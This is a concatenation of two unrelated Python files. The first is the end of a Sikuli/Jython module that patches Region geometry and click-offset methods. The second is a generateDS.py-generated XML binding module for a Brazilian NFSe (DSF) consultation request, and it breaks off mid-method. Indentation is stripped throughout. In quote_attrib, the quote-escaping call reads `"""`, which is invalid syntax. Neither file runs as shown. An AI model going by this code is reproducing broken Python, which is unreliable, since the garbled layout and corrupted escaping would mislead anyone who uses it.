# If we're trying to add None, just return the original region
if not operand:
return self
regions = [self, operand]
# more than one region, get min/max region
    # sentinel bounds; assumes screen coordinates stay within +/-9999
    minX, minY = 9999, 9999
    maxX, maxY = -9999, -9999
for region in regions:
if region.getX() < minX: minX = int(region.getX())
if region.getY() < minY: minY = int(region.getY())
# If this is a region type
if hasattr(region, "getW") and hasattr(region, "getH"):
if (region.getX() + region.getW()) > maxX: maxX = region.getX() + region.getW()
if (region.getY() + region.getH()) > maxY: maxY = region.getY() + region.getH()
else:
if region.getX() > maxX: maxX = int(region.getX())
if region.getY() > maxY: maxY = int(region.getY())
return Region(minX, minY, maxX-minX, maxY-minY)
JRegion.add = add
# Java Region patching
def limit(self, operand):
# If we're trying to limit None, return original
if not operand:
return self
x1 = self.getX() if self.getX() > operand.getX() else operand.getX()
y1 = self.getY() if self.getY() > operand.getY() else operand.getY()
x2 = (self.getX() + self.getW()) if (self.getX() + self.getW()) < (operand.getX() + operand.getW()) else (operand.getX() + operand.getW())
y2 = (self.getY() + self.getH()) if (self.getY() + self.getH()) < (operand.getY() + operand.getH()) else (operand.getY() + operand.getH())
# Check region is valid positive
if x2-x1 < 0 or y2-y1 < 0:
raise Exception("Region %s is outside the bounds of the ParentRegion %s" % (self, operand))
return Region(x1, y1, x2-x1, y2-y1)
JRegion.limit = limit
def offset(self, operand):
self.setX(self.getX() + operand.getX())
self.setY(self.getY() + operand.getY())
return self
##
def regionInit(self, operand, *args, **kargs):
# Handle a list of regions
if isinstance(operand, list):
region = None
for item in operand:
if region:
region = region.add(item)
else:
region = item
self.oldInit(region, *args, **kargs)
else:
self.oldInit(operand, *args, **kargs)
JRegion.oldInit = JRegion.__init__
JRegion.__init__ = regionInit
## Region patching
#JRegion.timeout = Config.regionTimeout
JRegion.clickOffset = Location(0,0)
# Define setClickOffset
def setClickOffset(self, offset):
assert isinstance(offset, Location)
self.clickOffset = offset
JRegion.setClickOffset = setClickOffset
# Define getClickLocation
def getClickLocation(self):
x = self.x + (self.w/2) + self.clickOffset.getX()
y = self.y + (self.h/2) + self.clickOffset.getY()
return Location(x, y)
JRegion.getClickLocation = getClickLocation
# Define getClickLocation
def getClickOffset(self):
return self.clickOffset
JRegion.getClickOffset = getClickOffset
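# Hedged illustration (assumes a running Sikuli/Jython environment) of the
# patched Region arithmetic defined above:
#
#   r1 = Region(0, 0, 100, 100)
#   r2 = Region(50, 50, 100, 100)
#   merged = r1.add(r2)         # bounding box of both: Region(0, 0, 150, 150)
#   clamped = merged.limit(r1)  # clipped back to r1:   Region(0, 0, 100, 100)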
|
py | 1a37e6dd5a2dbec7323e9edddc83618248df08f3 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated Wed Nov 27 15:47:42 2019 by generateDS.py version 2.29.2.
# Python 3.7.4 (default, Oct 4 2019, 06:57:26) [GCC 9.2.0]
#
# Command line options:
# ('--no-namespace-defs', '')
# ('--use-getter-setter', 'none')
# ('-f', '')
# ('-o', '/home/mileo/Projects/oca10/src/nfselib/nfselib/dsf/ReqConsultaNFSeRPS.py')
#
# Command line arguments:
# -
#
# Command line:
# /home/mileo/Projects/rvaly/generateds/generateDS.py --no-namespace-defs --use-getter-setter="none" -f -o "/home/mileo/Projects/oca10/src/nfselib/nfselib/dsf/ReqConsultaNFSeRPS.py" -
#
# Current working directory (os.getcwd()):
# dsf
#
from __future__ import unicode_literals
import sys
import re as re_
import base64
import datetime as datetime_
import warnings as warnings_
from builtins import str
try:
from lxml import etree as etree_
except ImportError:
from xml.etree import ElementTree as etree_
Validate_simpletypes_ = True
if sys.version_info.major == 2:
BaseStrType_ = basestring
else:
BaseStrType_ = str
def parsexml_(infile, parser=None, **kwargs):
if parser is None:
# Use the lxml ElementTree compatible parser so that, e.g.,
# we ignore comments.
try:
parser = etree_.ETCompatXMLParser()
except AttributeError:
# fallback to xml.etree
parser = etree_.XMLParser()
doc = etree_.parse(infile, parser=parser, **kwargs)
return doc
#
# Namespace prefix definition table (and other attributes, too)
#
# The module generatedsnamespaces, if it is importable, must contain
# a dictionary named GeneratedsNamespaceDefs. This Python dictionary
# should map element type names (strings) to XML schema namespace prefix
# definitions. The export method for any class for which there is
# a namespace prefix definition, will export that definition in the
# XML representation of that element. See the export method of
# any generated element type class for a example of the use of this
# table.
# A sample table is:
#
# # File: generatedsnamespaces.py
#
# GenerateDSNamespaceDefs = {
# "ElementtypeA": "http://www.xxx.com/namespaceA",
# "ElementtypeB": "http://www.xxx.com/namespaceB",
# }
#
try:
from generatedsnamespaces import GenerateDSNamespaceDefs as GenerateDSNamespaceDefs_
except ImportError:
GenerateDSNamespaceDefs_ = {}
#
# The root super-class for element type classes
#
# Calls to the methods in these classes are generated by generateDS.py.
# You can replace these methods by re-implementing the following class
# in a module named generatedssuper.py.
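# A hedged sketch of such an override module (illustrative only): the
# replacement must supply every gds_* helper the generated classes call,
# so in practice you copy the fallback class below and edit selectively.
#
#   # File: generatedssuper.py
#   class GeneratedsSuper(object):
#       def gds_format_string(self, input_data, input_name=''):
#           # e.g. normalize whitespace in every exported string
#           return ' '.join(input_data.split())
#       # ... remaining helpers copied unchanged from the fallback below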
try:
from generatedssuper import GeneratedsSuper
except ImportError as exp:
class GeneratedsSuper(object):
tzoff_pattern = re_.compile(r'(\+|-)((0\d|1[0-3]):[0-5]\d|14:00)$')
class _FixedOffsetTZ(datetime_.tzinfo):
def __init__(self, offset, name):
self.__offset = datetime_.timedelta(minutes=offset)
self.__name = name
def utcoffset(self, dt):
return self.__offset
def tzname(self, dt):
return self.__name
def dst(self, dt):
return None
def gds_format_string(self, input_data, input_name=''):
return input_data
def gds_validate_string(self, input_data, node=None, input_name=''):
if not input_data:
return ''
else:
return input_data
def gds_format_base64(self, input_data, input_name=''):
return base64.b64encode(input_data)
def gds_validate_base64(self, input_data, node=None, input_name=''):
return input_data
def gds_format_integer(self, input_data, input_name=''):
return '%d' % input_data
def gds_validate_integer(self, input_data, node=None, input_name=''):
return input_data
def gds_format_integer_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_integer_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
int(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of integers')
return values
def gds_format_float(self, input_data, input_name=''):
            # rstrip('0') alone can leave a dangling '.' (e.g. 10.0 -> '10.'),
            # which would break xs:decimal pattern checks; strip that too.
            return ('%.15f' % input_data).rstrip('0').rstrip('.')
def gds_validate_float(self, input_data, node=None, input_name=''):
return input_data
def gds_format_float_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_float_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of floats')
return values
def gds_format_double(self, input_data, input_name=''):
return '%e' % input_data
def gds_validate_double(self, input_data, node=None, input_name=''):
return input_data
def gds_format_double_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_double_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of doubles')
return values
def gds_format_boolean(self, input_data, input_name=''):
return ('%s' % input_data).lower()
def gds_validate_boolean(self, input_data, node=None, input_name=''):
return input_data
def gds_format_boolean_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_boolean_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
if value not in ('true', '1', 'false', '0', ):
raise_parse_error(
node,
'Requires sequence of booleans '
'("true", "1", "false", "0")')
return values
def gds_validate_datetime(self, input_data, node=None, input_name=''):
return input_data
def gds_format_datetime(self, input_data, input_name=''):
if input_data.microsecond == 0:
_svalue = '%04d-%02d-%02dT%02d:%02d:%02d' % (
input_data.year,
input_data.month,
input_data.day,
input_data.hour,
input_data.minute,
input_data.second,
)
else:
_svalue = '%04d-%02d-%02dT%02d:%02d:%02d.%s' % (
input_data.year,
input_data.month,
input_data.day,
input_data.hour,
input_data.minute,
input_data.second,
('%f' % (float(input_data.microsecond) / 1000000))[2:],
)
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
@classmethod
def gds_parse_datetime(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
time_parts = input_data.split('.')
if len(time_parts) > 1:
micro_seconds = int(float('0.' + time_parts[1]) * 1000000)
input_data = '%s.%s' % (time_parts[0], micro_seconds, )
dt = datetime_.datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S.%f')
else:
dt = datetime_.datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S')
dt = dt.replace(tzinfo=tz)
return dt
def gds_validate_date(self, input_data, node=None, input_name=''):
return input_data
def gds_format_date(self, input_data, input_name=''):
_svalue = '%04d-%02d-%02d' % (
input_data.year,
input_data.month,
input_data.day,
)
try:
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(
hours, minutes)
except AttributeError:
pass
return _svalue
@classmethod
def gds_parse_date(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
dt = datetime_.datetime.strptime(input_data, '%Y-%m-%d')
dt = dt.replace(tzinfo=tz)
return dt.date()
def gds_validate_time(self, input_data, node=None, input_name=''):
return input_data
def gds_format_time(self, input_data, input_name=''):
if input_data.microsecond == 0:
_svalue = '%02d:%02d:%02d' % (
input_data.hour,
input_data.minute,
input_data.second,
)
else:
_svalue = '%02d:%02d:%02d.%s' % (
input_data.hour,
input_data.minute,
input_data.second,
('%f' % (float(input_data.microsecond) / 1000000))[2:],
)
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
def gds_validate_simple_patterns(self, patterns, target):
# pat is a list of lists of strings/patterns. We should:
# - AND the outer elements
# - OR the inner elements
found1 = True
for patterns1 in patterns:
found2 = False
for patterns2 in patterns1:
if re_.search(patterns2, target) is not None:
found2 = True
break
if not found2:
found1 = False
break
return found1
@classmethod
def gds_parse_time(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
if len(input_data.split('.')) > 1:
dt = datetime_.datetime.strptime(input_data, '%H:%M:%S.%f')
else:
dt = datetime_.datetime.strptime(input_data, '%H:%M:%S')
dt = dt.replace(tzinfo=tz)
return dt.time()
def gds_str_lower(self, instring):
return instring.lower()
def get_path_(self, node):
path_list = []
self.get_path_list_(node, path_list)
path_list.reverse()
path = '/'.join(path_list)
return path
Tag_strip_pattern_ = re_.compile(r'\{.*\}')
def get_path_list_(self, node, path_list):
if node is None:
return
tag = GeneratedsSuper.Tag_strip_pattern_.sub('', node.tag)
if tag:
path_list.append(tag)
self.get_path_list_(node.getparent(), path_list)
def get_class_obj_(self, node, default_class=None):
class_obj1 = default_class
if 'xsi' in node.nsmap:
classname = node.get('{%s}type' % node.nsmap['xsi'])
if classname is not None:
names = classname.split(':')
if len(names) == 2:
classname = names[1]
class_obj2 = globals().get(classname)
if class_obj2 is not None:
class_obj1 = class_obj2
return class_obj1
def gds_build_any(self, node, type_name=None):
return None
@classmethod
def gds_reverse_node_mapping(cls, mapping):
            return dict(((v, k) for k, v in mapping.items()))
@staticmethod
def gds_encode(instring):
if sys.version_info.major == 2 and not isinstance(instring, unicode):
return instring.encode(ExternalEncoding)
else:
return instring
@staticmethod
def convert_unicode(instring):
if isinstance(instring, str):
result = quote_xml(instring)
elif sys.version_info.major == 2 and isinstance(instring, unicode):
result = quote_xml(instring).encode('utf8')
else:
result = GeneratedsSuper.gds_encode(str(instring))
return result
def __eq__(self, other):
if type(self) != type(other):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
def getSubclassFromModule_(module, class_):
'''Get the subclass of a class from a specific module.'''
name = class_.__name__ + 'Sub'
if hasattr(module, name):
return getattr(module, name)
else:
return None
#
# If you have installed IPython you can uncomment and use the following.
# IPython is available from http://ipython.scipy.org/.
#
## from IPython.Shell import IPShellEmbed
## args = ''
## ipshell = IPShellEmbed(args,
## banner = 'Dropping into IPython',
## exit_msg = 'Leaving Interpreter, back to program.')
# Then use the following line where and when you want to drop into the
# IPython shell:
# ipshell('<some message> -- Entering ipshell.\nHit Ctrl-D to exit')
#
# Globals
#
ExternalEncoding = 'utf-8'
Tag_pattern_ = re_.compile(r'({.*})?(.*)')
String_cleanup_pat_ = re_.compile(r"[\n\r\s]+")
Namespace_extract_pat_ = re_.compile(r'{(.*)}(.*)')
CDATA_pattern_ = re_.compile(r"<!\[CDATA\[.*?\]\]>", re_.DOTALL)
# Change this to redirect the generated superclass module to use a
# specific subclass module.
CurrentSubclassModule_ = None
#
# Support/utility functions.
#
def showIndent(outfile, level, pretty_print=True):
if pretty_print:
for idx in range(level):
outfile.write(' ')
def quote_xml(inStr):
"Escape markup chars, but do not modify CDATA sections."
if not inStr:
return ''
s1 = (isinstance(inStr, BaseStrType_) and inStr or '%s' % inStr)
s2 = ''
pos = 0
matchobjects = CDATA_pattern_.finditer(s1)
for mo in matchobjects:
s3 = s1[pos:mo.start()]
s2 += quote_xml_aux(s3)
s2 += s1[mo.start():mo.end()]
pos = mo.end()
s3 = s1[pos:]
s2 += quote_xml_aux(s3)
return s2
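# For example (illustrative), markup outside CDATA is escaped while the
# CDATA section passes through verbatim:
#
#   quote_xml('a < b <![CDATA[<raw & text>]]> & c')
#   # -> 'a &lt; b <![CDATA[<raw & text>]]> &amp; c'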
def quote_xml_aux(inStr):
    s1 = inStr.replace('&', '&amp;')
    s1 = s1.replace('<', '&lt;')
    s1 = s1.replace('>', '&gt;')
return s1
def quote_attrib(inStr):
s1 = (isinstance(inStr, BaseStrType_) and inStr or '%s' % inStr)
    s1 = s1.replace('&', '&amp;')
    s1 = s1.replace('<', '&lt;')
    s1 = s1.replace('>', '&gt;')
if '"' in s1:
if "'" in s1:
s1 = '"%s"' % s1.replace('"', """)
else:
s1 = "'%s'" % s1
else:
s1 = '"%s"' % s1
return s1
def quote_python(inStr):
s1 = inStr
if s1.find("'") == -1:
if s1.find('\n') == -1:
return "'%s'" % s1
else:
return "'''%s'''" % s1
else:
if s1.find('"') != -1:
s1 = s1.replace('"', '\\"')
if s1.find('\n') == -1:
return '"%s"' % s1
else:
return '"""%s"""' % s1
def get_all_text_(node):
if node.text is not None:
text = node.text
else:
text = ''
for child in node:
if child.tail is not None:
text += child.tail
return text
def find_attr_value_(attr_name, node):
attrs = node.attrib
attr_parts = attr_name.split(':')
value = None
if len(attr_parts) == 1:
value = attrs.get(attr_name)
elif len(attr_parts) == 2:
prefix, name = attr_parts
namespace = node.nsmap.get(prefix)
if namespace is not None:
value = attrs.get('{%s}%s' % (namespace, name, ))
return value
class GDSParseError(Exception):
pass
def raise_parse_error(node, msg):
    # node.sourceline is lxml-specific; fall back when stdlib ElementTree is used
    msg = '%s (element %s/line %s)' % (msg, node.tag, getattr(node, 'sourceline', '?'), )
raise GDSParseError(msg)
class MixedContainer:
# Constants for category:
CategoryNone = 0
CategoryText = 1
CategorySimple = 2
CategoryComplex = 3
# Constants for content_type:
TypeNone = 0
TypeText = 1
TypeString = 2
TypeInteger = 3
TypeFloat = 4
TypeDecimal = 5
TypeDouble = 6
TypeBoolean = 7
TypeBase64 = 8
def __init__(self, category, content_type, name, value):
self.category = category
self.content_type = content_type
self.name = name
self.value = value
def getCategory(self):
return self.category
def getContenttype(self, content_type):
return self.content_type
def getValue(self):
return self.value
def getName(self):
return self.name
def export(self, outfile, level, name, namespace,
pretty_print=True):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
outfile.write(self.value)
elif self.category == MixedContainer.CategorySimple:
self.exportSimple(outfile, level, name)
else: # category == MixedContainer.CategoryComplex
self.value.export(
outfile, level, namespace, name,
pretty_print=pretty_print)
def exportSimple(self, outfile, level, name):
if self.content_type == MixedContainer.TypeString:
outfile.write('<%s>%s</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeInteger or \
self.content_type == MixedContainer.TypeBoolean:
outfile.write('<%s>%d</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeFloat or \
self.content_type == MixedContainer.TypeDecimal:
outfile.write('<%s>%f</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeDouble:
outfile.write('<%s>%g</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeBase64:
outfile.write('<%s>%s</%s>' % (
self.name,
base64.b64encode(self.value),
self.name))
def to_etree(self, element):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
if len(element) > 0:
if element[-1].tail is None:
element[-1].tail = self.value
else:
element[-1].tail += self.value
else:
if element.text is None:
element.text = self.value
else:
element.text += self.value
elif self.category == MixedContainer.CategorySimple:
subelement = etree_.SubElement(
element, '%s' % self.name)
subelement.text = self.to_etree_simple()
else: # category == MixedContainer.CategoryComplex
self.value.to_etree(element)
def to_etree_simple(self):
if self.content_type == MixedContainer.TypeString:
text = self.value
elif (self.content_type == MixedContainer.TypeInteger or
self.content_type == MixedContainer.TypeBoolean):
text = '%d' % self.value
elif (self.content_type == MixedContainer.TypeFloat or
self.content_type == MixedContainer.TypeDecimal):
text = '%f' % self.value
elif self.content_type == MixedContainer.TypeDouble:
text = '%g' % self.value
elif self.content_type == MixedContainer.TypeBase64:
text = '%s' % base64.b64encode(self.value)
return text
def exportLiteral(self, outfile, level, name):
if self.category == MixedContainer.CategoryText:
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
self.category, self.content_type,
self.name, self.value))
elif self.category == MixedContainer.CategorySimple:
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
self.category, self.content_type,
self.name, self.value))
else: # category == MixedContainer.CategoryComplex
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s",\n' % (
self.category, self.content_type, self.name,))
self.value.exportLiteral(outfile, level + 1)
showIndent(outfile, level)
outfile.write(')\n')
class MemberSpec_(object):
def __init__(self, name='', data_type='', container=0,
optional=0, child_attrs=None, choice=None,
documentation=""):
self.name = name
self.data_type = data_type
self.container = container
self.child_attrs = child_attrs
self.choice = choice
self.optional = optional
self.documentation = documentation
def set_name(self, name): self.name = name
def get_name(self): return self.name
def set_data_type(self, data_type): self.data_type = data_type
def get_data_type_chain(self): return self.data_type
def get_data_type(self):
if isinstance(self.data_type, list):
if len(self.data_type) > 0:
return self.data_type[-1]
else:
return 'xs:string'
else:
return self.data_type
def set_container(self, container): self.container = container
def get_container(self): return self.container
def set_child_attrs(self, child_attrs): self.child_attrs = child_attrs
def get_child_attrs(self): return self.child_attrs
def set_choice(self, choice): self.choice = choice
def get_choice(self): return self.choice
def set_optional(self, optional): self.optional = optional
def get_optional(self): return self.optional
def get_documentation(self): return self.documentation
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class ReqConsultaNFSeRPS(GeneratedsSuper):
"""Schema utilizado para Consulta de NFSe."""
subclass = None
superclass = None
def __init__(self, Cabecalho=None, Lote=None, Signature=None):
self.original_tagname_ = None
self.Cabecalho = Cabecalho
self.Lote = Lote
self.Signature = Signature
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, ReqConsultaNFSeRPS)
if subclass is not None:
return subclass(*args_, **kwargs_)
if ReqConsultaNFSeRPS.subclass:
return ReqConsultaNFSeRPS.subclass(*args_, **kwargs_)
else:
return ReqConsultaNFSeRPS(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.Cabecalho is not None or
self.Lote is not None or
self.Signature is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='ReqConsultaNFSeRPS', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('ReqConsultaNFSeRPS')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='ReqConsultaNFSeRPS')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='ReqConsultaNFSeRPS', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='ReqConsultaNFSeRPS'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='ReqConsultaNFSeRPS', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.Cabecalho is not None:
self.Cabecalho.export(outfile, level, namespace_, name_='Cabecalho', pretty_print=pretty_print)
if self.Lote is not None:
self.Lote.export(outfile, level, namespace_, name_='Lote', pretty_print=pretty_print)
if self.Signature is not None:
self.Signature.export(outfile, level, namespace_='ds:', name_='Signature', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Cabecalho':
obj_ = CabecalhoType.factory()
obj_.build(child_)
self.Cabecalho = obj_
obj_.original_tagname_ = 'Cabecalho'
elif nodeName_ == 'Lote':
obj_ = tpLoteConsultaNFSe.factory()
obj_.build(child_)
self.Lote = obj_
obj_.original_tagname_ = 'Lote'
elif nodeName_ == 'Signature':
obj_ = SignatureType.factory()
obj_.build(child_)
self.Signature = obj_
obj_.original_tagname_ = 'Signature'
# end class ReqConsultaNFSeRPS
class CabecalhoType(GeneratedsSuper):
"""Cabeçalho do pedido."""
subclass = None
superclass = None
def __init__(self, CodCidade=None, CPFCNPJRemetente=None, transacao=True, Versao=None):
self.original_tagname_ = None
self.CodCidade = CodCidade
self.validate_tpCodCidade(self.CodCidade)
self.CPFCNPJRemetente = CPFCNPJRemetente
self.validate_tpCPFCNPJ(self.CPFCNPJRemetente)
self.transacao = transacao
self.Versao = Versao
self.validate_tpVersao(self.Versao)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, CabecalhoType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if CabecalhoType.subclass:
return CabecalhoType.subclass(*args_, **kwargs_)
else:
return CabecalhoType(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpCodCidade(self, value):
# Validate type tpCodCidade, a restriction on xs:unsignedInt.
if value is not None and Validate_simpletypes_:
if value < 1:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpCodCidade' % {"value" : value} )
def validate_tpCPFCNPJ(self, value):
# Validate type tpCPFCNPJ, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpCPFCNPJ_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpCPFCNPJ_patterns_, ))
validate_tpCPFCNPJ_patterns_ = [['^[0-9]{11}$|^[0-9]{14}$']]
    def validate_tpVersao(self, value):
        # Validate type tpVersao, a restriction on xs:long.
        if value is not None and Validate_simpletypes_:
            value = str(value)  # pattern matching and encode() require a string
            if not self.gds_validate_simple_patterns(
                    self.validate_tpVersao_patterns_, value):
                warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpVersao_patterns_, ))
    validate_tpVersao_patterns_ = [['^[0-9]{1,3}$']]
def hasContent_(self):
if (
self.CodCidade is not None or
self.CPFCNPJRemetente is not None or
not self.transacao or
self.Versao is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='CabecalhoType', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('CabecalhoType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='CabecalhoType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='CabecalhoType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='CabecalhoType'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='CabecalhoType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.CodCidade is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CodCidade>%s</ns1:CodCidade>%s' % (self.gds_format_integer(self.CodCidade, input_name='CodCidade'), eol_))
if self.CPFCNPJRemetente is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CPFCNPJRemetente>%s</ns1:CPFCNPJRemetente>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CPFCNPJRemetente), input_name='CPFCNPJRemetente')), eol_))
if self.transacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:transacao>%s</ns1:transacao>%s' % (self.gds_format_boolean(self.transacao, input_name='transacao'), eol_))
if self.Versao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Versao>%s</ns1:Versao>%s' % (self.gds_format_integer(self.Versao, input_name='Versao'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'CodCidade':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'CodCidade')
self.CodCidade = ival_
# validate type tpCodCidade
self.validate_tpCodCidade(self.CodCidade)
elif nodeName_ == 'CPFCNPJRemetente':
CPFCNPJRemetente_ = child_.text
CPFCNPJRemetente_ = self.gds_validate_string(CPFCNPJRemetente_, node, 'CPFCNPJRemetente')
self.CPFCNPJRemetente = CPFCNPJRemetente_
# validate type tpCPFCNPJ
self.validate_tpCPFCNPJ(self.CPFCNPJRemetente)
elif nodeName_ == 'transacao':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'transacao')
self.transacao = ival_
elif nodeName_ == 'Versao':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
